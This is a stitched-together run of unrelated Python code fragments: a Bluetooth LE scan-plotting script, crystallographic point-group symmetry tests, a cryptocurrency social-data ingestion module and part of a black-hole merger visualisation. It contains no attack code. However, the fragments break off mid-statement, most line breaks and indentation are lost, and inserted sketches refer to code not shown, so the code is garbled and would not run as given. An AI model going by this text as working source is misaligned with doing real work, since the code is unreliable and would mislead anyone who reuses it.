bx.plot(df_byte['x'] ,df_byte['y'], color='r') # show the plot plt.show() plt.pause(0.0001) # <-- sets the current plot until refreshed 
#------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- else : #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- if display: #print "gap_scan_response: rssi: %d, packet_type: %d, sender: %s, address_type: %d, bond: %d, data_len: %d" % \ # (rssi, packet_type, ':'.join(['%02X' % ord(b) for b in sender[::-1]]), address_type, bond, data_len) t = datetime.datetime.now() t_now= float("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000)) t_start=float("%ld.%03ld" % (time.mktime(start_time.timetuple()), start_time.microsecond/1000)) t_run=t_now-t_start disp_list = [] for c in options.display: if c == 't': if options.time_in_ms: disp_list.append("%f" % t_run ) if not(options.time_in_ms): disp_list.append("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000) ) elif c == 'r': disp_list.append("%d" % rssi) elif c == 'p': disp_list.append("%d" % packet_type) elif c == 's':
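# Driving sketch for the BGAPI helpers above (serial port path and scan parameters are
# assumptions; pyserial provides serial.Serial). Each ble_cmd_* writes a raw BGAPI
# frame: a 4-byte header [message type, payload length, class id, command id] followed
# by the struct-packed payload, which is the same framing bgapi_parse_plot()
# reassembles on the receive side. The snippet relies on the script's globals
# (options, start_time, df, ax, ...) being initialised earlier in the file.
import time
import serial

ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)    # port path is an assumption
ble_cmd_gap_set_scan_parameters(ser, 0xC8, 0xC8, 1)       # interval, window, active scan
ble_cmd_gap_discover(ser, 1)                              # discovery mode; value assumed here
while True:
    while ser.inWaiting():
        bgapi_parse_plot(ord(ser.read()))
    time.sleep(0.0001)                                    # don't burden the CPU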
two symmetries, test that both do not exist in the # subgroup of the other sym1 = all_symmetries # identify place in list by name, cannot test symmetry directy as D3 # and D3x are the same and causes an index issue i = [s.name for s in _groups].index(sym1.name) if i + 1 < len(_groups): values = [] # only test successive symmetries in _groups to avoid repetition for sym2 in _groups[i + 1 :]: if {sym1.name, sym2.name} == {"32", "321"}: # D3 and D3x are defined to be the same, so do not test continue sym2_in_sym1_sg = True if sym2 in sym1.subgroups else False sym1_in_sym2_sg = True if sym1 in sym2.subgroups else False values.append(sym2_in_sym1_sg + sym1_in_sym2_sg) # value==0 is okay, ie. unrelated symmetries # value==1 is okay, ie. only one is subgroup of other # if value==2 then both symmetries exist in subgroup of other assert not any(v == 2 for v in values) def test_unique_unrelated_symmetries(): sym1 = D6 sym2 = C4 assert sym1 not in sym2.subgroups assert sym2 not in sym1.subgroups # unique will be computed manually sym12 = _get_unique_symmetry_elements(sym1, sym2) sym21 = _get_unique_symmetry_elements(sym2, sym1) sym12 = sym12[np.lexsort(sym12.data.T)] sym21 = sym21[np.lexsort(sym21.data.T)] assert sym12.size == sym21.size # symmetry order matters, as discussed in # DOI: http://dx.doi.org/10.1098/rspa.2017.0274 assert not np.allclose(sym12.data, sym21.data) def test_hash(): h = [hash(s) for s in _groups] assert len(set(h)) == len(_groups) def test_hash_persistence(): h1 = [hash(s) for s in _groups] h2 = [hash(deepcopy(s)) for s in _groups] assert all(h1a == h2a for h1a, h2a in zip(h1, h2)) @pytest.mark.parametrize("symmetry", [C1, C4, Oh]) def test_symmetry_plot(symmetry): figure = symmetry.plot(return_figure=True) assert isinstance(figure, plt.Figure) assert len(figure.axes) == 1 ax = figure.axes[0] num = 1 if symmetry.is_proper else 2 assert len(ax.collections) == num c0 = ax.collections[0] assert len(c0.get_offsets()) == np.count_nonzero(~symmetry.improper) assert c0.get_label().lower() == "upper" if num > 1: c1 = ax.collections[1] assert len(c1.get_offsets()) == np.count_nonzero(symmetry.improper) assert c1.get_label().lower() == "lower" assert len(ax.texts) == 2 assert ax.texts[0].get_text() == "a" assert ax.texts[1].get_text() == "b" plt.close("all") @pytest.mark.parametrize("symmetry", [C1, C4, Oh]) def test_symmetry_plot_raises(symmetry): with pytest.raises(TypeError, match="Orientation must be a Rotation instance"): _ = symmetry.plot(return_figure=True, orientation="test") class TestFundamentalSectorFromSymmetry: """Test the normals, vertices and centers of the fundamental sector for all 32 crystallographic point groups. 
""" def test_fundamental_sector_c1(self): pg = C1 # 1 fs = pg.fundamental_sector assert fs.data.size == 0 assert fs.vertices.data.size == 0 assert fs.center.data.size == 0 assert fs.edges.data.size == 0 def test_fundamental_sector_ci(self): pg = Ci # -1 fs = pg.fundamental_sector normal = [[0, 0, 1]] assert np.allclose(fs.data, normal) assert fs.vertices.data.size == 0 assert np.allclose(fs.center.data, normal) def test_fundamental_sector_c2(self): pg = C2 # 2 fs = pg.fundamental_sector normal = [[0, 1, 0]] assert np.allclose(fs.data, normal) assert fs.vertices.data.size == 0 assert np.allclose(fs.center.data, normal) def test_fundamental_sector_cs(self): pg = Cs # m fs = pg.fundamental_sector normal = [[0, 0, 1]] assert np.allclose(fs.data, normal) assert fs.vertices.data.size == 0 assert np.allclose(fs.center.data, normal) def test_fundamental_sector_c2h(self): pg = C2h # 2/m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_d2(self): pg = D2 # 222 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_c2v(self): pg = C2v # mm2 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_d2h(self): pg = D2h # mmm fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.center.data, [[1 / 3, 1 / 3, 1 / 3]]) def test_fundamental_sector_c4(self): pg = C4 # 4 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.5, 0.5, 0]]) def test_fundamental_sector_s4(self): pg = S4 # -4 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_c4h(self): pg = C4h # 4/m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.center.data, [[1 / 3, 1 / 3, 1 / 3]]) def test_fundamental_sector_d4(self): pg = D4 # 422 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.center.data, [[1 / 3, 1 / 3, 1 / 3]]) def test_fundamental_sector_c4v(self): pg = C4v # 4mm fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.7071, -0.7071, 0]], atol=1e-4) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.3536, 0.1464, 0]], atol=1e-4) def test_fundamental_sector_d2d(self): pg = D2d # -42m fs = pg.fundamental_sector assert np.allclose( fs.data, [[0, 0, 1], [0.7071, 0.7071, 0], [0.7071, -0.7071, 0]], atol=1e-4 ) assert np.allclose( fs.vertices.data, [[0.7071, -0.7071, 0], [0, 0, 1], [0.7071, 0.7071, 0]] ) assert np.allclose(fs.center.data, [[0.4714, 0, 1 / 3]], atol=1e-4) def 
test_fundamental_sector_d4h(self): pg = D4h # 4/mmm fs = pg.fundamental_sector assert np.allclose( fs.data, [[0, 0, 1], [0, 1, 0], [0.7071, -0.7071, 0]], atol=1e-4 ) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0.7071, 0.7071, 0]], atol=1e-4 ) assert np.allclose(fs.center.data, [[0.569, 0.2357, 1 / 3]], atol=1e-3) def test_fundamental_sector_c3(self): pg = C3 # 3 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.433, 0.75, 0]], atol=1e-4) def test_fundamental_sector_s6(self): pg = S6 # -3 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [-0.5, 0.866, 0]], atol=1e-4 ) assert np.allclose(fs.center.data, [[1 / 6, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_d3(self): pg = D3 # 32 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [-0.5, 0.866, 0]], atol=1e-4 ) assert np.allclose(fs.center.data, [[1 / 6, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_c3v(self): pg = C3v # 3m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0.5, 0.866, 0], [0.5, -0.866, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.5, 0, 0]]) def test_fundamental_sector_d3d(self): pg = D3d # -3m fs = pg.fundamental_sector assert np.allclose( fs.data, [[0, 0, 1], [0.5, 0.866, 0], [0.5, -0.866, 0]], atol=1e-3 ) assert np.allclose( fs.vertices.data, [[0.866, -0.5, 0], [0, 0, 1], [0.866, 0.5, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[0.577, 0, 1 / 3]], atol=1e-3) def test_fundamental_sector_c6(self): pg = C6 # 6 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.866, -0.5, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.433, 0.25, 0]], atol=1e-3) def test_fundamental_sector_c3h(self): pg = C3h # -6 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [-0.5, 0.866, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[1 / 6, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_c6h(self): pg = C6h # 6/m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, -0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0.5, 0.866, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[0.5, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_d6(self): pg = D6 # 622 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, -0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0.5, 0.866, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[0.5, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_c6v(self): pg = C6v # 6mm fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.5, -0.866, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.25, 0.067, 0]], atol=1e-3) def test_fundamental_sector_d3h(self): pg = D3h # -6m2 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, -0.5,
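# The tests above all follow the same pattern; a compact sketch of it (assuming the
# orix-style point-group objects such as C2 imported at the top of this test module):
import numpy as np

def check_sector(pg, expected_normals, expected_center, atol=1e-3):
    fs = pg.fundamental_sector
    assert np.allclose(fs.data, expected_normals, atol=atol)        # sector plane normals
    assert np.allclose(fs.center.data, expected_center, atol=atol)  # sector centre vector

# e.g. point group 2, matching test_fundamental_sector_c2 above:
check_sector(C2, [[0, 1, 0]], [[0, 1, 0]])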
<filename>ingestion/tasks.py import concurrent.futures import datetime import pymongo import urllib.request from common import database as db, util from ingestion import config, manager as mgr from ingestion.datasources import reddit, twitter, cryptocompare as cc, coinmarketcap as cmc, stocktwits as st from ingestion import analysis def init(): db.init(config.database) db.create_indexes() reddit.init_api() twitter.init_api() class ImportCoinList(mgr.IngestionTask): """ Task to import the list of coins from coinmarketcap.com and cryptocompare.com This checks all coins on every run, and only makes updates to new/changed items in the db while this is inefficient, this only needs to run a couple times a day and it's better to be sure we have correct info, as all other tasks depend on it """ def __get_links(self, coin): links = self._get_data(cmc.CoinLinks(coin)) if links is None: return None # If we have a subreddit, make sure it's valid, because some links are broken on cmc if "subreddit" in links: if not reddit.is_valid(links["subreddit"]): self._warn("Invalid subreddit {}".format(links["subreddit"])) del links["subreddit"] missing_links = {"subreddit", "twitter", "btctalk_ann"} - set(links.keys()) if len(missing_links) > 0 and "cc_id" in coin: cc_links = self._get_data(cc.CoinLinks(coin["cc_id"])) if cc_links: for missing_link in missing_links: if missing_link in cc_links: links[missing_link] = cc_links[missing_link] return links @staticmethod def __duplicate_symbols(coins): """Returns a list of symbols that have duplicates in the coin list""" symbols = set() duplicate_symbols = set() for coin in coins: sym = coin["symbol"] if sym in symbols: duplicate_symbols.add(sym) else: symbols.add(sym) return duplicate_symbols def __merge_cc_data(self, coins, cc_coins): """Merges the cryptocompare ids into the coin list this allows us to pull coin data from both sources """ def full_id(coin): return "{}_{}".format(coin["symbol"], coin["name"]).lower() # Symbols are not guaranteed to be unique, so to be sure we map a coin from # coinmarketcap to cryptocompare we use <symbol_name> as the id cc_lookup = {} for coin in cc_coins: cid = full_id(coin) if cid in cc_lookup: self._fatal("Duplicate cid {}".format(cid)) else: cc_lookup[cid] = coin for coin in coins: cid = full_id(coin) if cid in cc_lookup: coin["cc_id"] = cc_lookup[cid]["cc_id"] coin["icon"] = cc_lookup[cid]["icon"] def _run(self): current_coins = self._get_data(cmc.CoinList()) cc_coins = self._get_data(cc.CoinList()) if not current_coins or not cc_coins: self._fatal("Failed to get coinlists from remotes") stored_coins = db.get_coins() # Find the set of ids that we don't have in the database yet current_ids = util.list_to_set(current_coins, "cmc_id") stored_ids = util.list_to_set(stored_coins, "cmc_id") new_ids = current_ids - stored_ids # map from coinmarketcap id to coins stored_coins_map = util.list_to_dict(stored_coins, "cmc_id") print("Total current coins (coinmarketcap.com):", len(current_ids)) print("Locally stored coins:", len(stored_ids)) print("New coins to process:", len(new_ids)) self.__merge_cc_data(current_coins, cc_coins) processed = 0 coin_updates = 0 for coin in current_coins: links = self.__get_links(coin) if links is None: continue for name, val in links.items(): coin[name] = val in_db = coin["cmc_id"] in stored_ids if not in_db: coin["_id"] = db.next_sequence_id("coins") self._db_insert("coins", coin) else: stored_coin = stored_coins_map[coin["cmc_id"]] coin["_id"] = stored_coin["_id"] # Update only if changed if coin != 
stored_coin: # fields will allow to be updated only if not empty. # This prevents removing good data if we simply failed to get the data this time. # This has the drawback that bad data won't get removed # The only draw back is that if bad data got corrected to be empty # we would not remove it here, but we can deal with that manually for now updateable = {"cc_id", "subreddit", "twitter", "btctalk_ann", "icon"} updates = {} for field in updateable: current = coin[field] if field in coin else "" stored = stored_coin[field] if field in stored_coin else "" if current != stored and len(current) > 0: updates[field] = current if len(updates) > 0: coin_updates += 1 self._db_update_one("coins", coin["_id"], updates) processed += 1 self._progress(processed, len(current_coins)) print("Total coins", len(current_coins)) print("Added", len(new_ids), "new coins") print("Updated", coin_updates) class ImportHistoricalData(mgr.IngestionTask): """Task to Import historical daily data from a specified DataSource""" def __init__(self, collection, data_source, coin_filter=None): """ :param collection: the db collection to store the data :param data_source: the DataSource used to get the data :param coin_filter: optional to filter which coins to use """ super().__init__() self.__collection = collection self.__data_source = data_source self.__coin_filter = coin_filter self._name += "-" + collection @staticmethod def _outdated(coins, latest_updates): """Returns a list of coins with outdated data in the db""" coins_to_update = {} # Make a list of coins that don't have up to date historical data for coin in coins: coin_id = coin["_id"] update_start = datetime.datetime(2011, 1, 1) if coin_id in latest_updates: most_recent = latest_updates[coin_id]["date"] today = datetime.datetime.utcnow() if today.day - most_recent.day <= 1: continue update_start = most_recent + datetime.timedelta(days=1) coins_to_update[coin_id] = update_start return coins_to_update def _run(self): coins = db.get_coins(self.__coin_filter) latest_data = db.get_latest(self.__collection) coins_to_update = self._outdated(coins, latest_data) print("Coins with no {} data: {}".format(self.__collection, len(coins) - len(latest_data))) print("Coins with out of date {} data: {}".format(self.__collection, len(coins_to_update))) processed = 0 coins = util.list_to_dict(coins, "_id") for coin_id in coins_to_update: coin = coins[coin_id] update_start = coins_to_update[coin_id] new_data = self._get_data(self.__data_source(coin, start=update_start)) if new_data: for day in new_data: day["coin_id"] = coin["_id"] self._db_insert(self.__collection, new_data) print("Added all historical", self.__collection, "data for", coin["symbol"]) else: self._error("no historical data found for {}, starting on {}".format(coin["symbol"], update_start)) processed += 1 self._progress(processed, len(coins_to_update)) class ImportPrices(mgr.IngestionTask): """Task to import current prices for all coins""" def _run(self): data = self._get_data(cmc.Ticker()) if not data: self._fatal("Failed to get coinmarketcap ticker") # Need to map coinmarketcap ids back to ours stored_coins = db.get_coins() id_map = {} for coin in stored_coins: id_map[coin["cmc_id"]] = coin["_id"] for coin in data: cmc_id = coin["cmc_id"] if cmc_id in id_map: coin["coin_id"] = id_map[cmc_id] del coin["cmc_id"] else: self._error("Can't add price data to unknown coin {}".format(cmc_id)) # filter out coins we haven't seen yet # we'll pick them up after our ImportCoinList runs again data = [x for x in data if "coin_id" in 
x] self._db_insert("prices", data) class ImportRedditStats(mgr.IngestionTask): """Task to import current reddit stats""" def __init__(self, collection, get_stats): super().__init__() self.__collection = collection self.__get_stats = get_stats self._name += "-" + collection def _run(self): coins = db.get_coins({"subreddit": {"$exists": True}}) processed = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: future_to_coin = {executor.submit(self._get_data, self.__get_stats, coin["subreddit"]): coin for coin in coins} for future in concurrent.futures.as_completed(future_to_coin): coin = future_to_coin[future] try: today = datetime.datetime.utcnow() stats = future.result() if stats: stats["date"] = today stats["coin_id"] = coin["_id"] self._db_insert(self.__collection, stats) else: self._error("Failed to get reddit stats for r/{}".format(coin["subreddit"])) except Exception as err: self._error("Failed to get future results for r/{}, {}".format(coin["subreddit"], err)) processed += 1 self._progress(processed, len(coins)) class ImportStockTwits(mgr.IngestionTask): """Task to import recent StockTwits posts""" def __init__(self, collection, num_posts=2): super().__init__() self.__collection = collection self.num_posts = num_posts def _run(self): coins = st.CoinList() coins = self._get_data(coins) for coin in range(len(coins.iloc[:self.num_posts,:])): posts = st.recentPosts(coins.loc[coin, 'symbol'] + '.X', coins.loc[coin, 'coin_id'], coins.loc[coin, 'name']) posts = self._get_data(posts) self._db_insert(self.__collection, posts) class ImportCommentStats(mgr.IngestionTask): """Task to import social media comment stats""" def __init__(self, collection, comment_scanner, coin_filter, max_workers=5): super().__init__() self.__comment_scanner = comment_scanner self.__collection = collection self.__coin_filter = coin_filter self.__max_workers = max_workers self._name += "-" + collection def _run(self): coins = db.get_coins(self.__coin_filter) hours = 1 processed = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=self.__max_workers) as executor: future_to_coin = {} for coin in coins: scanner = self.__comment_scanner(coin, hours) fut = executor.submit(scanner.find_comments) future_to_coin[fut] = (coin, scanner) for future in concurrent.futures.as_completed(future_to_coin): coin, scanner = future_to_coin[future] try: now = datetime.datetime.utcnow() record = { "date": now, "coin_id": coin["_id"], "count": scanner.count(), "sum_score": scanner.sum_score(), "avg_score": scanner.avg_score(), "avg_sentiment": scanner.avg_sentiment(), "strong_pos": scanner.count_strong_pos(), "strong_neg": scanner.count_strong_neg() } self._db_insert(self.__collection, record) strong_pos = scanner.strong_pos() strong_neg = scanner.strong_neg() # Remove old comments to reduce storage requirements now = datetime.datetime.utcnow() max_age = now - datetime.timedelta(days=200) db.mongo_db.recent_comments.remove({"date": {"$lt": max_age}}) for comment in strong_pos + strong_neg: r = { "date": now, "coin_id": coin["_id"], "text": comment.text, "score": comment.score, "sentiment": comment.sentiment, "platform": self.__collection } self._db_insert("recent_comments", r) except Exception as err: self._error("Failed to get future results for r/{}, {}".format(coin["subreddit"], err)) processed += 1 self._progress(processed, len(coins)) class ImportCryptoCompareStats(mgr.IngestionTask): """Task to import stats from cryptocompare""" def _run(self): coins = db.get_coins({"cc_id": {"$exists": True}}) processed = 0 
for coin in coins: stats = self._get_data(cc.SocialStats(coin["cc_id"])) if stats: stats["date"] = datetime.datetime.utcnow() stats["coin_id"] = coin["_id"] self._db_insert("cryptocompare_stats", stats) else: self._warn("No stats for coin {}".format(coin["symbol"])) processed += 1 self._progress(processed, len(coins)) class DownloadCoinIcons(mgr.IngestionTask): """Task to download icon image files for all coins""" def _run(self): coins = db.get_coins({"icon": {"$exists": True}}) processed = 0 for coin in coins: missing = db.mongo_db.coin_icons.find_one({"coin_id": coin["_id"]}) is None if "icon" in coin and len(coin["icon"]) > 0 and
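# A minimal sketch (hypothetical helper, not part of the ingestion module above) of the
# recency test performed by ImportHistoricalData._outdated. Comparing the ``.day``
# attributes of two datetimes only compares the day-of-month, so a timedelta-based
# check like this one also behaves correctly across month and year boundaries.
import datetime

def needs_update(most_recent, now=None, max_gap_days=1):
    """Return True when the stored data is more than ``max_gap_days`` old."""
    now = now or datetime.datetime.utcnow()
    return (now - most_recent) > datetime.timedelta(days=max_gap_days)

# Data refreshed within the last day is considered current ...
assert not needs_update(datetime.datetime.utcnow() - datetime.timedelta(hours=20))
# ... while data that is three days old is stale and would be re-imported.
assert needs_update(datetime.datetime.utcnow() - datetime.timedelta(days=3))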
q/(1.+q) mB = 1./(1.+q) # Get mesh grid on bottom plane to generate waveform sph_gridX, gridX, sph_gridY, gridY, sph_gridZ, gridZ \ = get_grids_on_planes(11, max_range) # evaluate remnant fit fit_name = 'surfinBH7dq2' fit = surfinBH.LoadFits(fit_name) # If omega_ref is None, will assume the spins are given in the # coorbital frame at t=-100M mf, chif, vf, mf_err, chif_err, vf_err \ = fit.all(q, chiA, chiB, omega0=omega_ref) # Get Bh shapes assuming fixed spin magnitudes shape_BhA = get_BH_shape(mA, chiA) shape_BhB = get_BH_shape(mB, chiB) shape_BhC = get_BH_shape(mf, chif) #print(np.linalg.norm(chif)) #print(np.linalg.norm(vf)) #print(np.linalg.norm(vf) * 3 * 10**5) # Will stop plotting waveform after this time # long enough for waveform pattern to disappear, taking into account # propagation delay waveform_end_time = 50 + 2*max_range if uniform_time_step_size is None: # Use large step size after ringdown to exaggerate kicks dt_remnant = 100 else: dt_remnant = uniform_time_step_size # common time array: After waveform_end_time, each step is 100M t = np.append(t_binary[t_binary<waveform_end_time], \ np.arange(waveform_end_time, 10000+waveform_end_time, dt_remnant)) if HANGUP_HACKS: t = t[t - t[0] <= 4100] # assume merger is at origin BhC_traj = np.array([tmp*t for tmp in vf]) # Attaching 3D axis to the figure ax = axes3d.Axes3D(fig) if not no_wave_time_series: l, b, w, h = ax.get_position().bounds if rescale_fig_for_widgets: ax.set_position([l, b + 0.25*h, w*0.7, 0.75*h ]) # axes to plot waveform time series hax = fig.add_axes([0.135, 0.08, 0.5, 0.17]) hax.clear() else: ax.set_position([l, b + 0.25*h, w, 0.75*h ]) # axes to plot waveform time series hax = fig.add_axes([0.135, 0.08, 0.83, 0.17]) # estimate maximum of waveform for scale of timeseries hmax_est = np.max(np.abs(get_waveform_timeseries(h_nrsur, 0, 90))) hax.set_ylim([ -hmax_est, hmax_est ]) if HANGUP_HACKS: hax.set_xlim(0, 4100) if auto_rotate_camera: camera_traj = get_camera_trajectory(t_binary) else: camera_traj = None if LOW_DEF: time_fontsize = 5 properties_fontsize = 5 properties_text_yloc = 0.75 freeze_fontsize = 7 timestep_fontsize = 6 label_fontsize = 5 ticks_fontsize = 5 title_fontsize = 7 ticks_pad = -5 label_pad = -11 else: time_fontsize = 12 properties_fontsize = 10 properties_text_yloc = 0.8 freeze_fontsize = 14 timestep_fontsize = 12 label_fontsize = 10 ticks_fontsize = 10 title_fontsize = 14 ticks_pad = 0 label_pad = 0 time_text = ax.text2D(0.03, 0.05, '', transform=ax.transAxes, \ fontsize=time_fontsize, zorder=zorder_dict['info_text']) properties_text = ax.text2D(0.05, properties_text_yloc, '', \ transform=ax.transAxes, fontsize=properties_fontsize, \ zorder=zorder_dict['info_text']) freeze_text = ax.text2D(0.6, 0.7, '', transform=ax.transAxes, \ fontsize=freeze_fontsize, color=colors_dict['info'], \ zorder=zorder_dict['notice_text']) timestep_text = ax.text2D(0.45, 0.7, '', transform=ax.transAxes, \ fontsize=timestep_fontsize, color=colors_dict['info'], \ zorder=zorder_dict['notice_text']) # NOTE: Can't pass empty arrays into 3d version of plot() dataLines_binary = [BhA_traj, BhB_traj, 1, 1, 1] # get wavefrom at viewpoint h_viewpoint = get_waveform_timeseries(h_nrsur, ax.azim, ax.elev) if LOW_DEF: arrow_mutation_scale = 10 else: arrow_mutation_scale = 20 traj_alpha = 0.8 lines = [\ # These two are for plotting component tracjectories ax.plot(BhA_traj[0,0:1]-1e10, BhA_traj[1,0:1], BhA_traj[2,0:1], \ color=colors_dict['BhA_traj'], lw=2, alpha=traj_alpha, \ zorder=zorder_dict['traj'])[0], \ 
ax.plot(BhB_traj[0,0:1]-1e10, BhB_traj[1,0:1], BhB_traj[2,0:1], \ color=colors_dict['BhB_traj'], lw=2, alpha=traj_alpha, \ zorder=zorder_dict['traj'])[0], \ # These two are for plotting component BH spins ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['BhA_spin'], \ zorder=zorder_dict['spin'])), \ ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['BhB_spin'], \ zorder=zorder_dict['spin'])), \ # This is for plotting angular momentum direction ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['L'], \ zorder=zorder_dict['L'])), \ # This is for plotting remnant spin ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['BhC_spin'], \ zorder=zorder_dict['spin'])), \ ] if not no_wave_time_series: lines += [ \ # These two is for plotting the waveform time series hax.plot(t_binary, np.real(h_viewpoint), label='$h_+$', \ color=colors_dict['h+'], lw=1.2)[0], \ hax.plot(t_binary, np.imag(h_viewpoint), label='$h_{\\times}$', \ color=colors_dict['hx'], lw=1.2)[0], \ # This is for plotting the slider along the waveform time series hax.axvline(x=t_binary[0]), \ ] hax.legend(loc='upper left', ncol=2) hax.set_xlabel('$t\,(M)$', fontsize=label_fontsize) hax.set_ylabel('$h\,r/M$', fontsize=label_fontsize) hax.tick_params(axis='x', which='major', labelsize=ticks_fontsize) hax.tick_params(axis='y', which='major', labelsize=ticks_fontsize) dataLines_remnant = [1] # Setting the axes properties # This seems to set the actual limits to max_range ax.set_xlim3d([-max_range*0.96, max_range*0.96]) ax.set_ylim3d([-max_range*0.96, max_range*0.96]) ax.set_zlim3d([-max_range*0.96, max_range*0.96]) ax.set_xlabel('$x\,(M)$', fontsize=label_fontsize) ax.set_ylabel('$y\,(M)$', fontsize=label_fontsize) ax.set_zlabel('$z\,(M)$', fontsize=label_fontsize) ax.xaxis.pane.set_edgecolor('black') ax.yaxis.pane.set_edgecolor('black') ax.zaxis.pane.set_edgecolor('black') ax.set_facecolor('white') #ax.xaxis._axinfo['tick']['inward_factor'] = 0 #ax.yaxis._axinfo['tick']['inward_factor'] = 0 #ax.zaxis._axinfo['tick']['inward_factor'] = 0 ax.xaxis._axinfo['tick']['outward_factor'] = 0 ax.yaxis._axinfo['tick']['outward_factor'] = 0 ax.zaxis._axinfo['tick']['outward_factor'] = 0 ax.tick_params(axis='x', which='major', pad=ticks_pad, \ labelsize=ticks_fontsize) ax.tick_params(axis='y', which='major', pad=ticks_pad, \ labelsize=ticks_fontsize) ax.tick_params(axis='z', which='major', pad=ticks_pad, \ labelsize=ticks_fontsize) ax.xaxis.labelpad = label_pad ax.yaxis.labelpad = label_pad ax.zaxis.labelpad = label_pad -3 if not no_surrogate_label: ax.set_title('NRSur7dq2 + %s'%fit_name, fontsize=time_fontsize, \ x=0.74, y=0.99) # number of frames to include in orbit trace hist_frames = int(0.75*(PTS_PER_ORBIT)) # Will freeze video at this index freeze_idx = np.argmin(np.abs(t - FREEZE_TIME)) # color range for contourf # Get linthresh from first index. With SymLogNorm, whenever the # value is less than linthresh, the color scale is linear. Else log. linthresh = np.max(np.abs(get_waveform_on_grid(t, 0, h_nrsur, sph_gridZ))) # Get vmax from waveform at peak. 
